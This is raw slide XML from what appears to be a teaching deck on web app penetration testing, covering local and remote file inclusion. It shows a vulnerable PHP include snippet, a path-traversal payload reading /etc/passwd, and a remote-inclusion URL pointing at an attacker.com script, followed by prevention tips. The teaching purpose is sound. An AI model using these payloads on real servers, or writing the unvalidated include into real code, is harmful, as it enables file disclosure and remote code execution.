              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="4800" b="1"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F7DBEFDC-7468-D497-8BF3-1E402FE97891}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6566433" y="3633727"/>
              <a:ext cx="4919865" cy="461665"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0" anchor="ctr">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>INTRODUCTION</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2287432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704B178-D7AF-D5F6-AF0E-53B2AB4BD9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7E97ED7-4144-1EF0-6D41-6CAA339B44CE}"/>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E095D469-283E-E53C-A26B-C1621A390DA2}"/>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FILE INCLUSION</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2041415B-6F9F-A654-ACA6-E9C7EAA21576}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="635578" y="1310471"/>
            <a:ext cx="10920844" cy="2118529"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="15005D"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Local File Inclusion (LFI)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In LFI, an attacker can exploit a vulnerability to include files that are located on the server's local filesystem.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The attacker can navigate the filesystem and potentially access sensitive files like configuration files, password files, or log files, and sometimes execute malicious code.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22A612EF-DB36-B58E-AE82-8D6F26132BE8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="635578" y="3907654"/>
            <a:ext cx="10823359" cy="2031325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-MY" dirty="0"/>
              <a:t>http://example.com/index.php?page=profile.php</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-MY" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$file = $_GET['page'];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>include($file);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-MY" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If an attacker supplies </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>page=../../</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>/passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, the file /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/passwd (a sensitive file in Linux systems) could be included and displayed.</a:t>
            </a:r>
            <a:endParaRPr lang="en-MY" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4049818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2D47C7-81F5-747A-9BD4-F07E1A87119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93919C9-119B-E9F1-C80C-C3B53A709312}"/>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D835A6A9-572F-3F94-6804-A48771119E9C}"/>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FILE INCLUSION</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{158A8F01-181E-2DE4-9865-DACEBC6FE4F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="635578" y="1310471"/>
            <a:ext cx="10920844" cy="1703030"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="15005D"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Remote File Inclusion (RFI)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In RFI, an attacker can include a file from a remote server (usually malicious).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This can lead to serious security risks, such as the execution of remote code on the vulnerable server, data exfiltration, or the installation of malware.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA57F90F-8BBD-5449-6905-4E262F82A2A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="635578" y="3907654"/>
            <a:ext cx="10823359" cy="2031325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-MY" dirty="0"/>
              <a:t>http://example.com/index.php?page=profile.php</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-MY" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$file = $_GET['page'];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>include($file);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-MY" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If an attacker can pass a URL such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>page=http://attacker.com/malicious_script.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, the server may include and execute malicious code from the attacker’s server.</a:t>
            </a:r>
            <a:endParaRPr lang="en-MY" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7346349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E7C324-DAC5-8AF6-0407-0D88AAA4DE6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428EDD2-8F25-F069-D6E3-A762DF1DDCD1}"/>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65C6B1FB-0F74-3897-D6A1-E8B34380A4AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1132962" y="430121"/>
            <a:ext cx="9611232" cy="608969"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>FILE INCLUSION</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A667AB7-EEA9-B3F9-7218-E050FDFA2A48}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="635578" y="1479876"/>
            <a:ext cx="10920844" cy="1703030"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="15005D"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>HOW TO PREVENT FILE INCLUSION:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-MY" dirty="0"/>
              <a:t>Validate Input</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-MY" dirty="0"/>
              <a:t>Use Absolute Paths</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-MY" dirty="0"/>
              <a:t>Sanitize File Paths</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2409386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91B24EC-9338-6D48-A942-D0A04F7F15D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1821BA9-FA77-5314-E4EA-FB3DAF5805F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:duotone>
              <a:prstClr val="black"/>
              <a:schemeClr val="accent3">
                <a:tint val="45000"/>
                <a:satMod val="400000"/>
              </a:schemeClr>
            </a:duotone>
            <a:alphaModFix amt="35000"/>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33DA586F-986D-446A-756D-48665988F40E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1132962" y="3011088"/>
            <a:ext cx="9611232" cy="608969"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>QUIZ TIME!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34671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9C06D-52D9-20EE-166A-936C080769CE}"/>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4B1BC031-406E-92E6-74B6-6DC2E6377148}"/>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INTRODUCTION</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{93C76254-71CD-0BC0-A071-90613B95FC3D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="841865" y="1538319"/>
            <a:ext cx="10715897" cy="253402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Web application penetration testing, often referred to as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>web app pen testing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>or simply web app testing, is a systematic process of evaluating the security of a web application by simulating real-world attacks. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The goal is to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>discover vulnerabilities, weaknesses, and misconfigurations </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>that malicious actors could exploit to compromise the application or its underlying infrastructure.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="332901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29CC8-AFA0-7443-5DF8-4D6126596D5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16AD71-7959-E34D-DA90-3F88039542AC}"/>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69B96E58-D951-EF41-4D2D-96061F02EE69}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="323529" y="339509"/>
            <a:ext cx="11573197" cy="724247"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>TECHNIQUES</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="6" name="Diagram 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A1D8FD85-FD69-6E1C-23B1-6618EF8765CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="753611202"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="706437" y="1524884"/>
          <a:ext cx="10779126" cy="41252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96706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Why Businesses Need Ethical Hackers | Certified Ethical Hacking">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2BE470F-6F34-3CDB-8879-51D990F52365}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:duotone>
              <a:prstClr val="black"/>
              <a:schemeClr val="accent3">
                <a:tint val="45000"/>
                <a:satMod val="400000"/>
              </a:schemeClr>
            </a:duotone>
            <a:alphaModFix amt="35000"/>
            <a:extLst>
              <a:ext uri="{BEBA8EAE-BF5A-486C-A8C5-ECC9F3942E4B}">
                <a14:imgProps xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                  <a14:imgLayer r:embed="rId4">
                    <a14:imgEffect>
                      <a14:artisticBlur/>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2126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600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>INFORMATION GATHERING</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="Group 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3CCB3A26-4EF7-4AE3-B544-602E31387B37}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="569950" y="1389509"/>
            <a:ext cx="6238430" cy="5208851"/>
            <a:chOff x="732823" y="2045143"/>
            <a:chExt cx="4898146" cy="4089765"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="3" name="Group 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2535BC1C-AD87-4B65-9FDA-17D261C01A9C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm flipH="1">
              <a:off x="732823" y="3007650"/>
              <a:ext cx="4898146" cy="3127258"/>
              <a:chOff x="1585738" y="4408438"/>
              <a:chExt cx="2717520" cy="1735021"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="31" name="Oval 30">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{99AD4B73-8FF4-4221-94CE-25C909601B26}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1585738" y="5752874"/>
                <a:ext cx="2717520" cy="390585"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="65000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:ln>
                <a:no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43E2D379-4A78-40E2-9F22-E5F085058729}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm flipH="1">
                <a:off x="1855021" y="4408438"/>
                <a:ext cx="2426144" cy="1612821"/>
                <a:chOff x="6917382" y="4652701"/>
                <a:chExt cx="2983072" cy="1983048"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="12" name="Freeform: Shape 11">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6BB287FF-01F8-4D87-A1D4-D02E51E028F7}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>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4E3CDCC-152C-4E9D-97B1-2173440C3105}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>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w="570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31859BD-7525-4B2A-B9B5-F61E3564AC5F}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>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w="570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3643218-0DBA-4BFA-BDA7-B0D7EE0094D3}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>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7AC4EB-E961-405F-ACDA-B2434F876BE4}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>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7C7DB33-6C87-4BD6-B733-8B52949F12E2}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>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1A410AF-BEB1-42F0-8445-252CE520DCC5}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>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a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="6" name="Group 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28F1E337-6C60-4127-884D-6EC7C45D8862}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1036543" y="2045143"/>
              <a:ext cx="2961756" cy="3431661"/>
              <a:chOff x="810119" y="1788769"/>
              <a:chExt cx="2961756" cy="3431661"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="33" name="Freeform: Shape 32">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D05294A-8EBB-4E5E-AE89-A2B9790146E3}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="739140" flipH="1">
                <a:off x="2488836" y="1806214"/>
                <a:ext cx="589030" cy="684918"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="connsiteX0" fmla="*/ 737970 w 815751"/>
                  <a:gd name="connsiteY0" fmla="*/ 666829 h 948547"/>
                  <a:gd name="connsiteX1" fmla="*/ 821442 w 815751"/>
                  <a:gd name="connsiteY1" fmla="*/ 388905 h 948547"/>
                  <a:gd name="connsiteX2" fmla="*/ 410721 w 815751"/>
                  <a:gd name="connsiteY2" fmla="*/ 0 h 948547"/>
                  <a:gd name="connsiteX3" fmla="*/ 0 w 815751"/>
                  <a:gd name="connsiteY3" fmla="*/ 388905 h 948547"/>
                  <a:gd name="connsiteX4" fmla="*/ 42685 w 815751"/>
                  <a:gd name="connsiteY4" fmla="*/ 561540 h 948547"/>
                  <a:gd name="connsiteX5" fmla="*/ 90112 w 815751"/>
                  <a:gd name="connsiteY5" fmla="*/ 828082 h 948547"/>
                  <a:gd name="connsiteX6" fmla="*/ 90112 w 815751"/>
                  <a:gd name="connsiteY6" fmla="*/ 828082 h 948547"/>
